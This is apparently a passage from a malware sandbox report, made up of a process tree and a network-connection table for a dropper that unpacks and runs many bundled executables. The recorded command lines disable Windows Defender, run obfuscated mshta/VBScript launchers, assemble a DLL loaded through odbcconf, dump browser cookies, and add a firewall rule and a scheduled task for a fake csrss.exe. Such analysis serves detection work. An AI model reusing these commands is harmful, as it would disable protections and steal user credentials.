| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\85f5b66f8c0b9dd1838da31024190463ee565d0052f26bbfdaa84d12ed1163db.exe
"C:\Users\Admin\AppData\Local\Temp\85f5b66f8c0b9dd1838da31024190463ee565d0052f26bbfdaa84d12ed1163db.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15a8461882.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15635943177.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun154ca5fada.exe /mixtwo
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun157e7a96e632.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15168f90478cc7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15591a43f8a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1580e9cd8c23e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15372e8db79ed3d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15b94526a807b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1500b8e65c1f53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15132bf2c585337a0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun150e9a93676ff.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15c4c762b69ba5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1524d92394d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun156aa32cae4a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15e81af69f990d3a6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1515dbfc0edab0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1585e1028b0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun156d9ca8467.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1515dbfc0edab0.exe
Sun1515dbfc0edab0.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe
Sun156d9ca8467.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15372e8db79ed3d.exe
Sun15372e8db79ed3d.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1580e9cd8c23e.exe
Sun1580e9cd8c23e.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15591a43f8a.exe
Sun15591a43f8a.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15635943177.exe
Sun15635943177.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15e81af69f990d3a6.exe
Sun15e81af69f990d3a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1585e1028b0.exe
Sun1585e1028b0.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun154ca5fada.exe
Sun154ca5fada.exe /mixtwo
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe
Sun15a8461882.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun157e7a96e632.exe
Sun157e7a96e632.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15168f90478cc7.exe
Sun15168f90478cc7.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15c4c762b69ba5.exe
Sun15c4c762b69ba5.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156aa32cae4a.exe
Sun156aa32cae4a.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15b94526a807b.exe
Sun15b94526a807b.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1524d92394d.exe
Sun1524d92394d.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4472 -ip 4472
C:\Users\Admin\AppData\Local\Temp\is-HFUCS.tmp\Sun15b94526a807b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HFUCS.tmp\Sun15b94526a807b.tmp" /SL5="$2024A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15b94526a807b.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4520 -ip 4520
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If """" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun157e7a96e632.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun157e7a96e632.exe" -u
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCriPT: ClOsE(cReateoBJeCT ( "wsCRipT.shell"). RUN("cMd.ExE /q /R TyPe ""C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15635943177.exe"" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if """"== """" for %i iN (""C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15635943177.exe"" ) do taskkill /f -im ""%~Nxi"" ", 0 ,trUe ) )
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15b94526a807b.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15b94526a807b.exe" /SILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 412
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 412
C:\Users\Admin\AppData\Local\Temp\is-P4VBJ.tmp\Sun15b94526a807b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P4VBJ.tmp\Sun15b94526a807b.tmp" /SL5="$30204,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15b94526a807b.exe" /SILENT
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If """" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe" ) do taskkill -f /Im "%~NXg"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R TyPe "C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15635943177.exe" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if ""== "" for %i iN ("C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15635943177.exe") do taskkill /f -im "%~Nxi"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe" ) do taskkill -f /Im "%~NXg"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe
..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi
C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe
Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E
C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe
Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -im "Sun15635943177.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCriPT: ClOsE(cReateoBJeCT ( "wsCRipT.shell"). RUN("cMd.ExE /q /R TyPe ""C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe"" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if ""-PS7ykUulCvwqoVkaBFLeqX_1Bi ""== """" for %i iN (""C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe"" ) do taskkill /f -im ""%~Nxi"" ", 0 ,trUe ) )
C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "Sun156d9ca8467.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4592 -ip 4592
C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "Sun156d9ca8467.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If ""-PJJdHOofvf~E"" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If ""-PJJdHOofvf~E"" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 356
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R TyPe "C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if "-PS7ykUulCvwqoVkaBFLeqX_1Bi "== "" for %i iN ("C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe") do taskkill /f -im "%~Nxi"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "-PJJdHOofvf~E" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" ) do taskkill -f /Im "%~NXg"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "-PJJdHOofvf~E" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" ) do taskkill -f /Im "%~NXg"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScRIpt: close (crEateoBJeCT("wscRIpT.sHELl"). RUn ( "C:\Windows\system32\cmd.exe /q /C ECho | SeT /p = ""MZ"" > 2MXG5k.pR & copy /b /y 2MXG5K.pR + A0kCLvIX.Kc + SpiKDP6.H + ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku } " ,0 , TrUE ) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCrIPT: ClOSE (CReaTeobjECt ( "wsCRIPt.ShelL" ). run ( "cmd.EXe /R EChO 0%timE%tQM> rHUir.hh & EcHO | SeT /p = ""MZ"" > PCN3bFXS.F& copy /b /y Pcn3bFXS.F + 16AqXIX.Y + lSIVmd4C.I + VbVS~Fi.ZD+rhUIr.hh ..\JEnnF1QU.UEN & sTART odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN } & deL /Q * ",0 ,TRUe ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C ECho | SeT /p = "MZ" > 2MXG5k.pR © /b /y 2MXG5K.pR +A0kCLvIX.Kc +SpiKDP6.H+ ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R EChO 0%timE%tQM> rHUir.hh & EcHO | SeT /p = "MZ" > PCN3bFXS.F& copy /b /y Pcn3bFXS.F+ 16AqXIX.Y+ lSIVmd4C.I+ VbVS~Fi.ZD+rhUIr.hh ..\JEnnF1QU.UEN & sTART odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN } & deL /Q *
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScRIpt: close (crEateoBJeCT("wscRIpT.sHELl"). RUn ( "C:\Windows\system32\cmd.exe /q /C ECho | SeT /p = ""MZ"" > 2MXG5k.pR & copy /b /y 2MXG5K.pR + A0kCLvIX.Kc + SpiKDP6.H + ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku } " ,0 , TrUE ) )
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECho "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C ECho | SeT /p = "MZ" > 2MXG5k.pR © /b /y 2MXG5K.pR +A0kCLvIX.Kc +SpiKDP6.H+ ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>2MXG5k.pR"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>PCN3bFXS.F"
C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECho "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>2MXG5k.pR"
C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN }
C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1585e1028b0.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1585e1028b0.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /306-306
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| FR | 212.193.30.45:80 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| RU | 185.215.113.44:23759 | tcp | |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 8.8.8.8:53 | cloudjah.com | udp |
| US | 8.8.8.8:53 | mstdn.social | udp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| US | 8.8.8.8:53 | 103.236.13.49.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.hhiuew33.com | udp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.75:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| FI | 135.181.79.37:10902 | tcp | |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 8.8.8.8:53 | 75.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | koyu.space | udp |
| DE | 178.63.82.37:443 | koyu.space | tcp |
| US | 8.8.8.8:53 | 37.82.63.178.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| FI | 135.181.79.37:10902 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| FR | 212.193.30.29:80 | tcp | |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| FI | 135.181.79.37:10902 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| RU | 185.215.113.44:23759 | tcp | |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| FI | 135.181.79.37:10902 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| HU | 91.219.236.162:80 | tcp | |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| FI | 135.181.79.37:10902 | tcp | |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.133.67.172.in-addr.arpa | udp |
| HU | 91.219.236.162:80 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| MD | 185.163.47.176:80 | 185.163.47.176 | tcp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | ip.mivocloud.com | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 176.47.163.185.in-addr.arpa | udp |
| FI | 135.181.79.37:10902 | tcp | |
| RU | 185.215.113.44:23759 | tcp | |
| NL | 193.38.54.238:80 | 193.38.54.238 | tcp |
| US | 8.8.8.8:53 | 238.54.38.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FI | 135.181.79.37:10902 | tcp | |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| DE | 74.119.192.122:80 | tcp | |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| DE | 74.119.192.122:80 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FI | 135.181.79.37:10902 | tcp | |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| HU | 91.219.236.240:80 | tcp | |
| US | 8.8.8.8:53 | nameiusr.com | udp |
| FI | 135.181.79.37:10902 | tcp | |
| US | 8.8.8.8:53 | chrlerym.com | udp |
| US | 8.8.8.8:53 | opsiters.com | udp |
| US | 8.8.8.8:53 | logs.nameiusr.com | udp |
| US | 8.8.8.8:53 | logs.chrlerym.com | udp |
| US | 8.8.8.8:53 | logs.opsiters.com | udp |
| US | 8.8.8.8:53 | 5f217d38-d2a2-4481-a16c-619fc243b9a1.uuid.nameiusr.com | udp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| HU | 91.219.236.240:80 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| RU | 185.215.113.44:23759 | tcp | |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| HU | 91.219.236.240:80 | tcp | |
| US | 8.8.8.8:53 | server10.nameiusr.com | udp |
| SG | 13.251.16.150:443 | server10.nameiusr.com | tcp |
| FI | 135.181.79.37:10902 | tcp | |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| SG | 13.251.16.150:443 | server10.nameiusr.com | tcp |
| HU | 91.219.236.240:80 | tcp | |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| HU | 91.219.236.240:80 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| HU | 91.219.236.240:80 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| FI | 135.181.79.37:10902 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| RU | 185.215.113.44:23759 | tcp | |
| FI | 135.181.79.37:10902 | tcp | |
